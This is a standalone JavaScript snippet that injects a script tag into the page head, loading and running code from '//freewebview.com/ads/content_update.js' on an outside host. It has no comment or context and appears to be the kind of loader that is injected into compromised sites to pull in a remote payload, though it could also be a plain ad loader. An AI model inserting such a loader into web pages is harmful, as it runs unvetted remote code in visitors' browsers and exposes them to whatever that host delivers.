(function() {
    var head = document.getElementsByTagName('head')[0];
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.src = '//freewebview.com/ads/content_update.js';
    head.appendChild(script);
})();